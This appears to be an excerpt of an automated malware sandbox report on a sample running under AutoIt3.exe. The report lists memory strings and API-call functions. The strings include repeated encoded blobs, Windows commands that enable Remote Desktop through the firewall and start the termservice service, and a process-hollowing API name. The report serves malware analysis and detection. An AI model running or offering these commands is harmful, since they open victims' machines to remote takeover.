h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 0000002A.00000002.2499423017.00000000043F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 0000002A.00000002.2499423017.00000000043F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 0000002A.00000003.2497625413.00000000048DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 0000002A.00000003.2497625413.00000000048DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007523E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 35_2_007523E0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00751DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 35_2_00751DD8
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CF23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 38_2_00CF23E0
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CF1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 38_2_00CF1DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0043C0FA Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 41_2_0043C0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0043B403 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 41_2_0043B403